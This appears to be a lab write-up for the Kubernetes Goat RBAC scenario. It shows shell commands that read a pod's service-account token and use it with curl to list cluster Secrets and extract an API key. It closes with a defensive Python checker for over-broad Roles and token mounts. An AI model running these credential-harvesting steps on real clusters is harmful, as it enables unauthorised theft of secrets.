categories: []
date: '2023-10-31T15:05:46.254047+08:00'
tags: []
title: Kubernetes Goat 16 - RBAC least privileges misconfiguration
updated: 2023-10-31T15:05:45.943+08:00

RBAC least privileges misconfiguration

RBAC least-privilege misconfiguration

  • Because Kubernetes by default stores the secrets, tokens and service account information in a fixed directory, we can go straight to that directory and look for sensitive information:
cd /var/run/secrets/kubernetes.io/serviceaccount/

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_14-56-54_d41d8cd98f00b204e9800998ecf8427e.jpg

  • To point at the internal API server hostname, we can export it from the environment variable
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
  • Set the path to the ServiceAccount token
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
  • Set the namespace value
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
  • Read the ServiceAccount token
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
  • Point at the ca.crt path so that we can use it when querying with curl
export CACERT=${SERVICEACCOUNT}/ca.crt
  • Now we can use the token and the constructed query to explore the Kubernetes API
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-03-01_d41d8cd98f00b204e9800998ecf8427e.jpg

  • To query the secrets available in the default namespace, run the following command
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/secrets

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-03-37_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Query the secrets specific to a namespace
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets
  • Get the k8svaultapikey value from the secrets
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/${NAMESPACE}/secrets | grep k8svaultapikey

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-31_15-04-54_d41d8cd98f00b204e9800998ecf8427e.jpg
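As an added example (not part of the Kubernetes Goat scenario or of this post), here is an offline check for the two conditions the walkthrough relies on: a service-account token mounted at the fixed path used in the first step, and a Role that lets that token read Secrets, which is what the queries at the end exploit. It works on manifests as JSON/dicts (the shape kubectl prints with -o json), so it needs no cluster; the Roles, ServiceAccounts and Pods it inspects are constructed sample data, and the threshold "get on explicitly named Secrets is acceptable" is this example's own policy choice, not a Kubernetes rule.

```python
"""Offline RBAC / token-mount check for the misconfiguration in this scenario.

Added example, not part of Kubernetes Goat or its tooling. Manifests are
handled as plain JSON/dicts so it runs without a cluster; every manifest
below is constructed for the example.
"""
import json

# Verbs that return Secret contents. list and watch hand back whole objects,
# so they are as sensitive as get; "*" covers everything.
READ_VERBS = {"get", "list", "watch", "*"}


def rule_exposes_secrets(rule):
    """True if one RBAC rule grants unscoped read access to Secret objects.

    Secrets live in the core API group (""), so the rule must name "" or "*"
    in apiGroups, "secrets" or "*" in resources, and a read verb in verbs.
    Policy choice for this example: a rule that uses resourceNames and only
    grants "get" is treated as acceptably scoped; anything broader is flagged.
    """
    groups = set(rule.get("apiGroups", []))
    resources = set(rule.get("resources", []))
    verbs = set(rule.get("verbs", []))
    if not (groups & {"", "*"}):
        return False
    if not (resources & {"secrets", "*"}):
        return False
    if not (verbs & READ_VERBS):
        return False
    scoped_get_only = bool(rule.get("resourceNames")) and verbs <= {"get"}
    return not scoped_get_only


def find_secret_readers(manifests):
    """Names of Roles/ClusterRoles containing at least one flagged rule."""
    findings = []
    for obj in manifests:
        if obj.get("kind") not in ("Role", "ClusterRole"):
            continue
        if any(rule_exposes_secrets(r) for r in obj.get("rules", [])):
            ns = obj["metadata"].get("namespace", "cluster-wide")
            findings.append(f"{obj['kind']}/{obj['metadata']['name']} ({ns})")
    return findings


def pod_mounts_token(pod, service_accounts):
    """Will this pod get a token under /var/run/secrets/kubernetes.io/serviceaccount?

    A pod-level automountServiceAccountToken wins when present; otherwise the
    referenced ServiceAccount's field decides; the default is True, which is
    why the walkthrough finds a token in any pod that has not opted out.
    """
    spec = pod.get("spec", {})
    if "automountServiceAccountToken" in spec:
        return bool(spec["automountServiceAccountToken"])
    sa_name = spec.get("serviceAccountName", "default")
    sa = service_accounts.get(sa_name, {})
    return bool(sa.get("automountServiceAccountToken", True))


def pods_with_token(pods, service_accounts):
    """Names of pods that will have a service-account token mounted."""
    return [p["metadata"]["name"] for p in pods if pod_mounts_token(p, service_accounts)]


# Constructed sample manifests: one wildcard Role, one that can list Secrets,
# and one scoped to a single named Secret.
SAMPLE_ROLES = json.loads("""[
 {"kind": "Role", "metadata": {"name": "too-broad", "namespace": "default"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"kind": "Role", "metadata": {"name": "secret-lister", "namespace": "default"},
  "rules": [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
 {"kind": "Role", "metadata": {"name": "scoped", "namespace": "default"},
  "rules": [{"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]},
            {"apiGroups": [""], "resources": ["secrets"], "resourceNames": ["app-tls"], "verbs": ["get"]}]}
]""")

# Constructed ServiceAccounts (keyed by name) and Pods covering each precedence case.
SAMPLE_SERVICE_ACCOUNTS = {
    "default": {},
    "no-token": {"automountServiceAccountToken": False},
}

SAMPLE_PODS = [
    {"metadata": {"name": "app-default"}, "spec": {}},
    {"metadata": {"name": "app-opt-out"}, "spec": {"automountServiceAccountToken": False}},
    {"metadata": {"name": "app-sa-opt-out"}, "spec": {"serviceAccountName": "no-token"}},
    {"metadata": {"name": "app-override"},
     "spec": {"serviceAccountName": "no-token", "automountServiceAccountToken": True}},
]

if __name__ == "__main__":
    print("Roles that can read Secrets:", find_secret_readers(SAMPLE_ROLES))
    print("Pods that get a token mounted:", pods_with_token(SAMPLE_PODS, SAMPLE_SERVICE_ACCOUNTS))
```

The two checks correspond to the two fixes for this scenario: set automountServiceAccountToken to false on pods (or their ServiceAccount) that never talk to the API, and cut Roles down so that no workload token can list Secrets across a namespace.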